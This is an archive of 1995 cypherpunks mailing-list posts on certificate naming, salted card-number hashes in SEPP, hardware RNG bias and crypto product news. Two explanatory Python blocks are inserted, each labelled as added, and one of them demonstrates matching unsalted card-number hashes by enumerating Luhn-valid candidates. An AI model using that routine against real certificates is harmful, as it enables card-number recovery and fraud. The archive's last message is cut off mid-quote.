From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Hal <hfinney@shell.portal.com>
Date: Thu, 5 Oct 95 21:20:34 PDT
To: cypherpunks@toad.com
Subject: Re: Certificate proposal
In-Reply-To: <9510021553.AA13756@tis.com>
Message-ID: <199510060419.VAA20574@jobe.shell.portal.com>
MIME-Version: 1.0
Content-Type: text/plain


tomw@orac.engr.sgi.com (Tom Weinstein) writes:

>In article <DG06FE.IA8@sgi.sgi.com>, Hal <hfinney@shell.portal.com> writes:

>> OK, so suppose I want to send my credit card number to Egghead Software.
>> I get one of these new-fangled certificates from somebody, in which
>> VeriSign has certified that key 0x12345678 has hash 0x54321.  I think we
>> can agree that by itself this is not useful.  So, it will also bind in
>> some attribute.  What will that attribute be?

>Um, just a wild guess, but... your credit card number maybe?  (Well,
>okay, its hash.)

I may not have been clear: the certificate I was referring to was the one
from Egghead, the one which I will use to make sure that I have a valid
key for Egghead.  Such a certificate would of course not have my credit
card number; it would probably have some information related to Egghead.
My rhetorical point was that information would most plausibly be a NAME
by which I would refer to Egghead.  I am still trying to understand how
these proposals to take names out of the picture will apply to a
commonplace situation like this one.

Hal




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Simon Spero <ses@tipper.oit.unc.edu>
Date: Thu, 5 Oct 95 21:18:29 PDT
To: Norman Hardy <norm@netcom.com>
Subject: Re: Simple Hardware RNG Idea
In-Reply-To: <ac9a42dc01021004b46d@DialupEudora>
Message-ID: <Pine.SOL.3.91.951005210923.11085D-100000@chivalry>
MIME-Version: 1.0
Content-Type: text/plain


On Thu, 5 Oct 1995, Norman Hardy wrote:

> Simon Spero writes:
> ....
> > What about a beam of high intensity ionising radiation aimed at the
> > detector?
> ....
> You presumably use the oddness of the count for your random bit in some
> predetermined time interval. External radiation can change, but not bias
> the parity. If the counter saturates, the counter may be biased towards one

Hmmm. But isn't this method slightly biased? If the probability of  N 
events < the probability of N+1 events, wouldn't you need a large number 
of events per bit to make the bias insignificant? 

The measurement I was thinking of (which would have been susceptible to 
the external attack) was to measure the interval between events, and 
convert that to a uniform distribution. That's probably trying to get too 
many random bits per event, but does let you use much lower level sources.

BTW, I was just having dinner with a bunch of guys from HP labs in 
Bristol, UK, and the subject of hardware RNGs came up. The idea of 
Strontium-90  as the next computer consumable has a certain appeal- the 
designating brandname is "Omnisource".

 "Are you having trouble scintillating? With Omnisource, you can scin till
  dawn!" 

Simon
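
The bias question raised in this message, worked through as an added Python example that is not part of the thread. It assumes detector counts per interval are Poisson with mean lam (the thread does not name a distribution); all function names are illustrative.

```python
import math
import random


def parity_bias_closed_form(lam: float) -> float:
    """P(even count) - P(odd count) for a Poisson count with mean lam."""
    return math.exp(-2.0 * lam)


def parity_bias_by_summation(lam: float, terms: int = 200) -> float:
    """The same quantity, summed term by term from the Poisson pmf."""
    p = math.exp(-lam)  # P(N = 0)
    bias = 0.0
    for n in range(terms):
        bias += p if n % 2 == 0 else -p
        p *= lam / (n + 1)  # P(N = n + 1) from P(N = n)
    return bias


def mean_events_for_bias(max_bias: float) -> float:
    """Mean events per output bit needed so the parity bias is <= max_bias."""
    return math.log(1.0 / max_bias) / 2.0


def interval_top_bit_prob(true_rate: float, assumed_rate: float) -> float:
    """P(top bit = 1) for u = 1 - exp(-assumed_rate * t), t ~ Exp(true_rate).

    u is uniform only when the two rates agree; a source that changes the
    true rate skews every bit derived from u.
    """
    return 0.5 ** (true_rate / assumed_rate)


def simulate_parity_bias(lam: float, bits: int, seed: int = 1) -> float:
    """Monte Carlo estimate of P(even) - P(odd) over unit-length intervals."""
    rng = random.Random(seed)
    even = 0
    for _ in range(bits):
        count, t = 0, rng.expovariate(lam)
        while t < 1.0:
            count += 1
            t += rng.expovariate(lam)
        even += (count % 2 == 0)
    return 2.0 * even / bits - 1.0


def simulate_interval_top_bit(true_rate: float, assumed_rate: float,
                              samples: int, seed: int = 1) -> float:
    """Monte Carlo estimate of P(top bit = 1) for the interval method."""
    rng = random.Random(seed)
    ones = 0
    for _ in range(samples):
        u = 1.0 - math.exp(-assumed_rate * rng.expovariate(true_rate))
        ones += (u >= 0.5)
    return ones / samples


if __name__ == "__main__":
    for lam in (0.5, 2.0, 5.0):
        print(f"mean events/bit {lam}: parity bias {parity_bias_closed_form(lam):.2e}")
    print("events/bit for bias 2^-64:", round(mean_events_for_bias(2.0 ** -64), 2))
    print("interval method, rate doubled externally:",
          interval_top_bit_prob(2.0, 1.0))
```

Under the Poisson assumption the parity bias falls off as exp(-2*lam), so raising the count rate only shrinks it, while the interval method is thrown off as soon as the true rate departs from the rate used in the conversion.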





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: rah@shipwright.com (Robert Hettinga)
Date: Thu, 5 Oct 95 18:31:50 PDT
To: cypherpunks@toad.com
Subject: (cpx) Mastercard, IBM, Netscape, CyberCash and GTE publish SEPP
Message-ID: <v02120d02ac9a33a0e5dd@[199.0.65.105]>
MIME-Version: 1.0
Content-Type: text/plain



--- begin forwarded text

To: e-payment@cc.bellcore.com, ietf-payments@cc.bellcore.com,
        www-buyinfo@allegra.att.com
Subject: Mastercard, IBM, Netscape, CyberCash and GTE publish SEPP
Mime-Version: 1.0
Date: Thu, 05 Oct 1995 16:12:23 -0400
From: Amir Herzberg <amir@watson.ibm.com>



MasterCard's Secure Electronic Payment Protocol is now available on the WWW at
http://www.mastercard.com/Sepp/sepptoc.htm (without the `l').

This protocol is based on iKP but includes much more details. You can download
it from the page above until we `re-hash' it into Internet Draft form.
Comments are very welcome, and I suggest we use the e-payment mailing list
for them (until an IETF working group is formed).

I believe that the publication of this spec and the STT spec suggests that
we should in fact proceed now with establishing a working group. So, I plan
to submit an updated charter soon... Comments on it are also welcome.

Best, Amir

Text version of the page:

Secure Electronic Payment Protocol Specification

The development of electronic commerce is at a critical juncture. Consumer
demand for secure access to electronic shopping and other services is very
high; merchants want simple, cost-effective methods for conducting
electronic transactions; financial institutions want a level-playing field
for software suppliers to ensure quality products at competitive prices.
The next step to achieving secure, cost-effective on-line transactions at a
rate fast enough to satisfy market demand, is the development of a single,
open industry specification.

The generally accepted process for developing a technical standard or
specification within an industry is comprised of five steps:

   Collaboration of interested parties

   Preparation of the document

   Availability of the document for comment

   Modification of the document based on the comments

   Publication of the document for implementation.

In an effort to develop a specification for securing bankcard transactions
over the Internet and other open networks, IBM, Netscape, GTE, CyberCash
and MasterCard have cooperatively developed the following draft document,
which is now available for review and comment. Each company brought unique
and valuable experience to the effort.

The result of this collaboration is Secure Electronic Payment Protocol
(SEPP), an open, vendor-neutral, non-proprietary, license-free specification
for securing on-line transactions. Currently in draft form, this document is
available for review and comment by all interested parties. It also will be
sent to Internet standards-setting bodies, including the Internet
Engineering Task Force. Once comments are received, modifications will be
made and a final document will be published in the public domain.



Access to SEPP Specification

 This specification is structured in five files in order to make downloading
 easier:

 Preface: This file provides an overview of the entire SEPP document.

 Postscript (.Z), Postscript (.zip), Postscript (.hqx),
 Mac OS (Word 5.1[.hqx])

 Part 1 - Business Requirements: This file defines the major business
 requirements for secure electronic payments.

 Postscript (.Z), Postscript (.zip), Postscript (.hqx),
 Mac OS (Word 5.1[.hqx])

 Part 2 - Functional Specification: This file contains the functional
 specification for the payment process and the certificate management system.

 Postscript (.Z), Postscript (.zip), Postscript (.hqx),
 Mac OS (Word 5.1[.hqx])

 Part 3 - Payment System Specification: This file defines the detailed design
 for the payment system.

 Postscript (.Z), Postscript (.zip), Postscript (.hqx),
 Mac OS (Word 5.1[.hqx])

 Part 4 - Certificate Management Specification: This file defines the detailed
 design for the Certificate Management System.

 Postscript (.Z), Postscript (.zip), Postscript (.hqx),
 Mac OS (Word 5.1[.hqx])

--- end forwarded text


-----------------
Robert Hettinga (rah@shipwright.com)
Shipwright Development Corporation, 44 Farquhar Street, Boston, MA 02131
USA (617) 323-7923
"Reality is not optional." --Thomas Sowell
>>>>Phree Phil: Email: zldf@clark.net  http://www.netresponse.com/zldf <<<<<






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: rah@shipwright.com (Robert Hettinga)
Date: Thu, 5 Oct 95 18:27:32 PDT
To: cypherpunks@toad.com
Subject: GC Tech GlobeID pilot
Message-ID: <v02120d08ac9a351a3ee0@[199.0.65.105]>
MIME-Version: 1.0
Content-Type: text/plain



--- begin forwarded text

X-Sender: pays@edelweb.fr
Mime-Version: 1.0
Date: Fri, 6 Oct 1995 00:46:46 +0100
To: Amir Herzberg <amir@watson.ibm.com>
From: pays@gctech.edelweb.fr (Paul-Andre Pays)
Subject: GC Tech GlobeID pilot
Cc: e-payment@cc.bellcore.com, ietf-payments@cc.bellcore.com,
        www-buyinfo@allegra.att.com



As it seems everyone is broadcasting URL about electronic payment
systems, let me propose
        http://globeid.gctech.fr/cgi-gid/welcome?Language=English
which does not lead to a specification but the Globe Online, Globe ID pilot
setup by GC Tech.

Sorry only a few pages are available in English by now.
  English and some other languages will be available within a few weeks

Sorry again, but because real content is and will be available
we committed to deliver only a few hundred Web Wallets for this
pilot. You can still use the web form to apply for one...

-- PAP

_________________________________________________________________________
PAP:  paul-andre.pays@gctech.edelWeb.fr
     tel:  +33 1 34 52 00 88                fax: +33 1 34 52 25 26
         GC Tech   "The Globe Online and Globe ID Technology Company"
  http://www.globeonline.fr/                 http://www.gctech.fr/

--- end forwarded text


-----------------
Robert Hettinga (rah@shipwright.com)
Shipwright Development Corporation, 44 Farquhar Street, Boston, MA 02131
USA (617) 323-7923
"Reality is not optional." --Thomas Sowell
>>>>Phree Phil: Email: zldf@clark.net  http://www.netresponse.com/zldf <<<<<






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Hal <hfinney@shell.portal.com>
Date: Thu, 5 Oct 95 21:41:13 PDT
To: cypherpunks@toad.com
Subject: Re: Certificate proposal
Message-ID: <199510060440.VAA23299@jobe.shell.portal.com>
MIME-Version: 1.0
Content-Type: text/plain


Bob Smart <smart@mel.dit.csiro.au> writes:
>Consider the IPSEC case. The current situation is:

>1. We go through some process, let's call it Process A, where we determine
>   that we want to talk to IP address 192.9.8.7.

This would be, say, a DNS lookup on www.egghead.com.

>2. We go through another process where we obtain the public key of 192.9.8.7.

I get it by connecting to that IP address and asking for it, or perhaps
I have it cached or I get it from some public cache.

>3. We then try to decide, based on one or more certificates, whether we
>   trust the public key to be the correct public key for 192.9.8.7.

I see the certificate is signed by someone I trust and it certifies that
this key is good for connections to Egghead Software at www.egghead.com.

>Now consider the key-centric version.

>1. Process A returns a public key which denotes the destination we want to
>   talk to.

OK, maybe this is some DNS variant that given www.egghead.com, returns a
public key 0x12345678.

>2. We then go through a process to obtain the IP address that belongs to
>   that public key. We probably won't use the public key as an index to
>   get that information. We probably use the information that was input
>   to Process A. In fact this information may fall out as a byproduct
>   of Process A. [However if we needed to make a scalable distributed
>   database of RSA public keys then I have a design to do this -
>   available on application.]

OK, so now I do another DNS lookup on www.egghead.com to get the IP
address.  Or maybe I even use key 0x12345678 as an alternative index to
get that address.

>3. We don't need to trust any certificates or anything else at this stage.
>   The fact that the IP address belongs to the Public Key is signed by
>   the Public Key itself.

Now you've lost me.  Are you saying that the key is self-certifying,
saying "I belong to 192.9.8.7"?  That is, it is accompanied by a
signature issued by that key itself on this IP address?  I hate to be
difficult, but this does not provide me with a warm feeling.  Anyone
could have issued that key, claiming to belong to that IP address.  If
the person who did so is able to interpose himself between me and that
address then my messages are not secure.

>The same thing happens with e-mail. If "Process A" gives us an e-mail
>address to send to then we worry about whether we have the right public
>key to go with it. If Process A gives us a Public Key then we can
>have certainty about the associated e-mail address because the association
>is signed by the Public Key.

Again, I don't follow how we gain this certainty.

>And a big win that just falls out of this is that I can have a
>continuous exchange of information with one IP destination even if
>it keeps changing its actual IP address (mobile computing) or I
>can have an e-mail conversation with a person who keeps changing
>their e-mail address. The things you want just fall out instead of
>requiring clever software solutions.

This can be dealt with in the certificate context by having a
certificated key sign a statement that the IP address is now
such-and-such.

>In the key-centric world a certificate binds some attribute as a property
>of a public key. So an X.509 certificate would say "The owner of this
>public key [i.e. person who knows the corresponding private key] owns
>the following point in the X.500 namespace", rather than that "the
>person identified by this DN owns the following public key". Experience
>has shown that the latter interpretation is a mine-field. It really
>doesn't work.

I don't really care whether the name is called an attribute, a
distinguished name, or an ooblek.  I just don't see how you're going to
get along without it.  The fact is, we live in a world populated by
people and companies and we use names to identify them.  I will grant
that there are problems with uniqueness but I don't think the solution
can be to just give up on the whole idea of names since they are so
messy.  Pretending that keys are communicating beings is not going to
work.

Hal




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: chen@intuit.com (Mark Chen)
Date: Thu, 5 Oct 95 22:15:05 PDT
To: kinney@bogart.Colorado.EDU (W. Kinney)
Subject: Re: Quantum Crypto: Anecdote
In-Reply-To: <199510011929.NAA29289@bogart.Colorado.EDU>
Message-ID: <9510060507.AA20374@doom>
MIME-Version: 1.0
Content-Type: text/plain



> Given the regularity with which fears of factoring by quantum
> computers comes up around here, I thought I'd share a brief story: At
> a party last night, I ran into a couple of acquaintances, and was
> delighted to learn that they are working on the current NIST quantum
> computing project, making quantum gates out of atomic traps similar
> to those used by Cornell and Weiman to get a Bose condensate with
> Rubidium (crypto relevance comes from odd places, eh?) Anyway, I
> talked them up a bit, and so far they've managed to construct a
> working "or" gate. The long-term project is to construct a quantum
> computer capable of factoring 15, which they expect to take at least
> several years.

Vazirani gave a talk at Parc a couple weeks ago, at which he described
a similar project under way at Los Alamos.  It's allegedly being
headed by Richard Hughes.

   - Mark -


--
Mark Chen 
chen@intuit.com
415/329-6913
finger for PGP public key
D4 99 54 2A 98 B1 48 0C  CF 95 A5 B0 6E E0 1E 1D



From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Adam Shostack <adam@homeport.org>
Date: Thu, 5 Oct 95 19:21:02 PDT
To: sjb@universe.digex.net (Scott Brickner)
Subject: Re: subjective names and MITM
In-Reply-To: <199510060051.UAA04613@universe.digex.net>
Message-ID: <199510060224.WAA03180@homeport.org>
MIME-Version: 1.0
Content-Type: text


Scott Brickner wrote:

| Adam Shostack writes:
| >	Just a minor nit regarding a well thought out post, public
| >keys are not 'global' ids, but 'system-wide' IDs.  For keys to be
| >really global, there needs to be a mechanism in place for insuring
| >that key ids are very probably unique.  One way to ensure that keys
| >are globally unique would be to integrate a KCA identifier with the
| >keyid, and KCAs base part of their reputation on not signing multiple
| >keys with the same id.
| 
| A public key *is* "very probably unique".  A "randomly selected" 1024 bit
| prime number has a specific amount of entropy in it.  The likelihood of
| two users world wide "randomly" choosing the same such prime may be
| precisely determined (assuming you can figure the entropy).

	The key does indeed have a high likelihood of being unique,
but dealing with 1024 bit identifiers could strain database systems,
especially when 100 well chosen bits would be more than enough.

Adam



-- 
"It is seldom that liberty of any kind is lost all at once."
					               -Hume




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Jeff Weinstein <jsw@netscape.com>
Date: Thu, 5 Oct 95 23:59:32 PDT
To: cypherpunks@toad.com
Subject: Re: Certificate proposal
In-Reply-To: <9510021553.AA13756@tis.com>
Message-ID: <3074D2F3.1E9@netscape.com>
MIME-Version: 1.0
Content-Type: text/plain


Hal wrote:
> 
> Jeff Weinstein <jsw@netscape.com> writes:
> >  I think the old idea of a certificate just binding a name and
> >a key is turning out to not be very useful.  That is why Netscape
> >Navigator 2.0 will support x509 version 3 certificates.  They allow
> >arbitrary attributes to be signed into a certificate.  In this new
> >world, you can think of a certificate as a way of binding a key with
> >various arbitrary attributes, one of which may be(but is not
> >required to be) a name.
> 
> OK, so suppose I want to send my credit card number to Egghead Software.
> I get one of these new-fangled certificates from somebody, in which
> VeriSign has certified that key 0x12345678 has hash 0x54321.  I think we
> can agree that by itself this is not useful.  So, it will also bind in
> some attribute.  What will that attribute be?

  It would be some value that would allow the credit card
authorization agency to match it up with the submitted credit
card number.  In the case of MasterCard's SEPP they are using
a salted hash of the Account Number, where the salt value is
unique per account, is secret, and is shared between the
bank and the card holder.

	--Jeff

-- 
Jeff Weinstein - Electronic Munitions Specialist
Netscape Communication Corporation
jsw@netscape.com - http://home.netscape.com/people/jsw
Any opinions expressed above are mine.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: shamrock@netcom.com (Lucky Green)
Date: Thu, 5 Oct 95 21:01:03 PDT
To: cypherpunks@toad.com
Subject: Re: NetManage & Cylink Crypto
Message-ID: <199510060358.XAA05252@book.hks.net>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

In article <9510060012.AA02236@ch1d157nwk>,
andrew_loewenstern@il.us.swissbank.com (Andrew Loewenstern) wrote:

> Anonymous wrote:
> >  The link with Cylink will allow NetManage to license and include
> >  the Cylink public key encryption technology in its applications
> >  with a variety of ciphering systems to be used in the NetManage
> >  suite, including: DES, Triple DES, Safer, IDEA, Skipjack, RC-2,
>                                                    ^^^^^^^^
> >  and RC-4.
> 
> Hey, this is interesting...  will Skipjack be included in future NetManage
> products or is this press-release only mentioning Skipjack as an example
> of a possible encryption algorithm for use with NetManage?

It probably requires a PCMCIA card.
- ---
[This message has been signed by an auto-signing service.  A valid signature
means only that it has been received at the address corresponding to the
signature and forwarded.]

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2
Comment: Gratis auto-signing service

iQBFAwUBMHSpfCoZzwIn1bdtAQHhuAGAk64TLT89fxllmp1WhLxT/QJCrUuz3RmG
MPI9irXcFyldaHEIlnDGpk7OQug5uTY1
=dyzf
-----END PGP SIGNATURE-----




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: nobody@REPLAY.COM (Anonymous)
Date: Thu, 5 Oct 95 15:59:52 PDT
To: cypherpunks@toad.com
Subject: NetManage & Cylink Crypto
Message-ID: <199510052259.XAA01586@utopia.hacktic.nl>
MIME-Version: 1.0
Content-Type: text/plain



NetManage & Cylink In Internet Encryption Deal


Guildford, Surrey, England, Oct 5 -- NetManage, a TCP/IP
specialist company, has signed a licensing deal with
Cylink Corporation. NetManage says the Cylink public key
cryptography technology will be incorporated in future
editions of NetManage's Internet applications software.

The move is significant since it marks the beginnings of
a competitor to the Netscape "secure" Web browsing
software, which has had two security flaws identified in
recent weeks.

Initially, NetManage's Chameleon Enterprise TCP/IP
applications suite will incorporate the Cylink public key
encryption technology, and later will include encryption
facilities in Internet Chameleon, a UKP139 PC-Windows
access suite designed for dial-up access to the Internet.

Both NetManage and Cylink plan to support an open
interface for Internet security which addresses the flaws
found in Netscape. The idea is to establish an open set
of standards to which Internet access packages of all
types will adhere to, and so ensure that companies
developing Internet software do not "re-invent the wheel"
when writing their software, and possibly open their
applications up to flaws.

According to NetManage, establishing a secure Internet
connection requires an Internet application to perform
two functions: authenticating the user, and encrypting
the data flow.

The link with Cylink will allow NetManage to license and
include the Cylink public key encryption technology in
its applications with a variety of ciphering systems to
be used in the NetManage suite, including: DES, Triple
DES, Safer, IDEA, Skipjack, RC-2, and RC-4.

NetManage claims the current implementations of security
proposed as standards by Netscape and RSA Data Security
are flawed, and fail to fully accommodate "open and
interoperable secure communications" between computers
which use different bulk encryption ciphers.

These problems, the company claims, have limited the
adoption of Internet security as a widespread
interoperable feature of all Internet software and
hardware products, including end-user applications,
servers, firewalls, and secure routers.

Later this month, NetManage and Cylink plan to announce
a next-generation "plug and play" Internet encryption
system. The implementation will be open and will not lock
software or hardware developers into the use of
encryption technology from any one vendor, as is the case
with Netscape, say the companies.

The related APIs, key exchange technology, and
encryption, will be made publicly available to other
software and hardware vendors. Licensing will include
source code and no per-copy royalty fees.

Further information can be downloaded from NetManage's
World Wide Web site at <http://www.netmanage.com>.

Contact: NetManage Europe, +44-1483-302333;
NetManage US, 408-973-7171.












From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Jeff Weinstein <jsw@netscape.com>
Date: Fri, 6 Oct 95 00:04:44 PDT
To: cypherpunks@toad.com
Subject: Re: Certificate proposal
In-Reply-To: <199510060358.UAA03869@orac.engr.sgi.com>
Message-ID: <3074D42E.58DE@netscape.com>
MIME-Version: 1.0
Content-Type: text/plain


Tom Weinstein wrote:
> 
> In article <DG06FE.IA8@sgi.sgi.com>, Hal <hfinney@shell.portal.com> writes:
> 
> > OK, so suppose I want to send my credit card number to Egghead Software.
> > I get one of these new-fangled certificates from somebody, in which
> > VeriSign has certified that key 0x12345678 has hash 0x54321.  I think we
> > can agree that by itself this is not useful.  So, it will also bind in
> > some attribute.  What will that attribute be?
> 
> Um, just a wild guess, but... your credit card number maybe?  (Well,
> okay, its hash.)

  The hash of just the card number isn't good enough.  If you collected
a bunch of certificates (they are public) then you could start guessing
valid card numbers and trying to match the hashes with your database.
The Mastercard SEPP proposal uses a salted hash, where the salt is
a shared secret between the bank and the user.

	--Jeff

> --
> Sure we spend a lot of money, but that doesn't mean    |  Tom Weinstein
> we *do* anything.  --  Washington DC motto             |  tomw@engr.sgi.com

  There are too many Weinsteins hanging out here lately...  :-)

-- 
Jeff Weinstein - Electronic Munitions Specialist
Netscape Communication Corporation
jsw@netscape.com - http://home.netscape.com/people/jsw
Any opinions expressed above are mine.
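
Jeff Weinstein's point in the two messages above (a bare hash of the card number in a public certificate can be matched by guessing, a hash salted with a per-account secret cannot), as an added Python example that is not part of the thread or of the SEPP specification. HMAC-SHA-256 stands in for SEPP's salted hash, whose construction the thread does not give; the account prefix, the function names and the 1000-candidate search space are constructed for illustration.

```python
import hashlib
import hmac
import secrets


def luhn_check_digit(partial: str) -> str:
    """Luhn check digit for an account number missing its last digit."""
    total = 0
    for i, ch in enumerate(reversed(partial)):
        d = int(ch)
        if i % 2 == 0:  # doubled positions once the check digit is appended
            d *= 2
            if d > 9:
                d -= 9
        total += d
    return str((10 - total % 10) % 10)


def unsalted_attribute(pan: str) -> str:
    """Weak form: certificate attribute is a bare hash of the number."""
    return hashlib.sha256(pan.encode()).hexdigest()


def salted_attribute(pan: str, salt: bytes) -> str:
    """Hardened form: hash keyed with a secret, per-account salt."""
    return hmac.new(salt, pan.encode(), hashlib.sha256).hexdigest()


def candidates(prefix: str, unknown_digits: int):
    """Every Luhn-valid number sharing a known prefix."""
    for n in range(10 ** unknown_digits):
        partial = prefix + str(n).zfill(unknown_digits)
        yield partial + luhn_check_digit(partial)


def match_public_attribute(attr: str, prefix: str, unknown_digits: int, hash_fn):
    """Return (number, guesses) if a candidate hashes to attr, else (None, guesses)."""
    guesses = 0
    for pan in candidates(prefix, unknown_digits):
        guesses += 1
        if hmac.compare_digest(hash_fn(pan), attr):
            return pan, guesses
    return None, guesses


def bank_verify(attr: str, submitted_pan: str, salt: bytes) -> bool:
    """The bank holds the salt, so it can tie a submitted number to the cert."""
    return hmac.compare_digest(salted_attribute(submitted_pan, salt), attr)


def demo() -> dict:
    prefix = "999900000000"            # constructed, not a real issuer range
    partial = prefix + "042"
    pan = partial + luhn_check_digit(partial)
    salt = secrets.token_bytes(16)     # shared by bank and card holder only

    weak = unsalted_attribute(pan)
    strong = salted_attribute(pan, salt)

    # An observer with the public certificate but not the salt.
    guessed_salt = bytes(16)
    weak_hit, weak_guesses = match_public_attribute(
        weak, prefix, 3, unsalted_attribute)
    strong_hit, strong_guesses = match_public_attribute(
        strong, prefix, 3, lambda p: salted_attribute(p, guessed_salt))

    return {
        "pan": pan,
        "weak_hit": weak_hit, "weak_guesses": weak_guesses,
        "strong_hit": strong_hit, "strong_guesses": strong_guesses,
        "bank_accepts": bank_verify(strong, pan, salt),
    }


if __name__ == "__main__":
    for key, value in demo().items():
        print(f"{key}: {value}")
```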




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Jeff Weinstein <jsw@netscape.com>
Date: Fri, 6 Oct 95 00:08:18 PDT
To: cypherpunks@toad.com
Subject: Re: Certificate proposal
In-Reply-To: <9510021553.AA13756@tis.com>
Message-ID: <3074D507.1EE1@netscape.com>
MIME-Version: 1.0
Content-Type: text/plain


Hal wrote:
> 
> tomw@orac.engr.sgi.com (Tom Weinstein) writes:
> 
> >In article <DG06FE.IA8@sgi.sgi.com>, Hal <hfinney@shell.portal.com> writes:
> 
> >> OK, so suppose I want to send my credit card number to Egghead Software.
> >> I get one of these new-fangled certificates from somebody, in which
> >> VeriSign has certified that key 0x12345678 has hash 0x54321.  I think we
> >> can agree that by itself this is not useful.  So, it will also bind in
> >> some attribute.  What will that attribute be?
> 
> >Um, just a wild guess, but... your credit card number maybe?  (Well,
> >okay, its hash.)
> 
> I may not have been clear: the certificate I was referring to was the one
> from Egghead, the one which I will use to make sure that I have a valid
> key for Egghead.  Such a certificate would of course not have my credit
> card number; it would probably have some information related to Egghead.
> My rhetorical point was that information would most plausibly be a NAME
> by which I would refer to Egghead.  I am still trying to understand how
> these proposals to take names out of the picture will apply to a
> commonplace situation like this one.

  I don't think that we need to get rid of names entirely.  It all
depends on the intended use.  In this case it would be reasonable
for the certificate to have the name in it.  It would also probably
be signed by a bank or card association CA, which was set up
specifically to sign merchant certificates.

	--Jeff

-- 
Jeff Weinstein - Electronic Munitions Specialist
Netscape Communication Corporation
jsw@netscape.com - http://home.netscape.com/people/jsw
Any opinions expressed above are mine.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: shamrock@netcom.com (Lucky Green)
Date: Thu, 5 Oct 95 21:11:26 PDT
To: cypherpunks@toad.com
Subject: Re: Certificates, Attributes, Web of Trust
Message-ID: <199510060409.AAA05305@book.hks.net>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

In article <ac9961b42202100433c4@[205.199.118.202]>, tcmay@got.net
(Timothy C. May) wrote:
[...]
> But I go further: a huge number of interesting applications of strong
> crypto have no connections at all with physical persons, let alone with
> True Names. Agents in computer transactions, applets fired across networks,
> agoric entities in computational ecologies, BlackNet sorts of markets, and
> on and on.

This is true. Some of the most interesting applications of crypto don't
involve True Names at all. The only reason, IMHO, why crypto is often
thought of in terms of communicating between two True Names is because it
is an obvious application to the layman. But it is the Blacknet type of
uses where crypto really shines.
- ---
[This message has been signed by an auto-signing service.  A valid signature
means only that it has been received at the address corresponding to the
signature and forwarded.]

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2
Comment: Gratis auto-signing service

iQBFAwUBMHSr6CoZzwIn1bdtAQECCAF+Jok52IdshM4nLGjwqiImzw93dy/zSy9E
QBmUR1yzX+17uuUoflSRE3R0bpx3uv+F
=UM4a
-----END PGP SIGNATURE-----




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Jeff Weinstein <jsw@netscape.com>
Date: Fri, 6 Oct 95 00:32:27 PDT
To: cypherpunks@toad.com
Subject: Re: Certificates, Attributes, Web of Trust
In-Reply-To: <ac99d8e3240210043452@[205.199.118.202]>
Message-ID: <3074DAAB.3D62@netscape.com>
MIME-Version: 1.0
Content-Type: text/plain


Timothy C. May wrote:
> 
> At 7:11 PM 10/5/95, Jeff Weinstein wrote:
> 
> >  How about if the systems allows you to get a certificate that
> >has any name in it that you want, where the issuer makes no
> >claims about the identity of the owner of the certificate?
> >How about if the software lets the user decide which CAs they
> >will accept certificates from?  Given these two features,
> >would you still consider requiring a certificate to be bad?
> 
> Let's make sure what we mean by these two points:
> 
> 1. "...allows you to get a certificate that has any name in it that you
> want, where the issuer makes no claims about the identity of the owner of
> the certificate?"
> 
> I would expect that a certificate for "%63rrW209neU6q!" would be issuable
> for a miniscule amount of money, and as many of these as are desired.
> 
> (No, I'm not saying "Verisign" must offer certificates for very low cost,
> only that there be no built-in costs, or built-in time delays and
> processing delays, that would prevent "Tim's Really Cheap and No Questions
> Asked Certificate Service" from issuing such certificates, cheaply and
> rapidly (in seconds, or less, as some applications will need this, if other
> services "demand" certificates).

  If you take a look at verisign's home page, they will be offering
"low assurance" certificates for free for non-commercial uses.  The
only thing they will guarantee about these certs is that the subject
name in the certificate is unique across all certificates signed
by their class I CA.  You should be able to get one of these
certs in real time via an HTML form.

> 2. "...software lets the user decide which CAs they will accept
> certificates from?"
> 
> Fine, provided the following CAs are acceptable:
> 
> -- an "automatic" certificate granter, essentially meant only to satisfy
> protocols which require certificates
> 
> -- a certifier for the Mob, which sells certificates for some fee
> 
> -- the application itself should be able to generate certificates
> immediately...call this the "null certification."
> 
> It is true that some of these examples seem to "undermine" the whole purpose
> of certificates, but this is precisely my point: if I want a key to be
> certified, I will determine the conditions under which I want it to be
> certified. Other parties are free to meet my conditions if they wish to do
> business with me, or not, as the case may be.

  Anyone is free to set up a CA.  In Netscape Navigator 2.0 the
user can decide which CAs they want to accept certs from, or just
mark individual certs as "trusted" no matter what CA they were
signed by.  If you the user choose to trust a CA run by the Mob,
then that's your business.

> The "null certification" is thus very important.
> 
> Naturally, I think this null certification makes the idea of _requiring_
> certification moot.
> 
> Will Netscape allow this?

  I assume that by "null certification" you mean self-signed
certificate.  As I said above, the user can choose to accept
any certificate they want, independent of who signed it.  If you
tell netscape that you want to accept "joe's" certificate for
the purposes of encrypted e-mail, then we don't care who signed
it.

	--Jeff

-- 
Jeff Weinstein - Electronic Munitions Specialist
Netscape Communication Corporation
jsw@netscape.com - http://home.netscape.com/people/jsw
Any opinions expressed above are mine.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Bill Stewart <stewarts@ix.netcom.com>
Date: Fri, 6 Oct 95 00:35:14 PDT
To: cypherpunks@toad.com
Subject: Re: subjective names and MITM
Message-ID: <199510060735.AAA22195@ix4.ix.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain


At 10:24 PM 10/5/95 -0400, Adam Shostack <adam@homeport.org> wrote:
>	The key does indeed have a high likelihood of being unique,
>but dealing with 1024 bit identifiers could strain database systems,
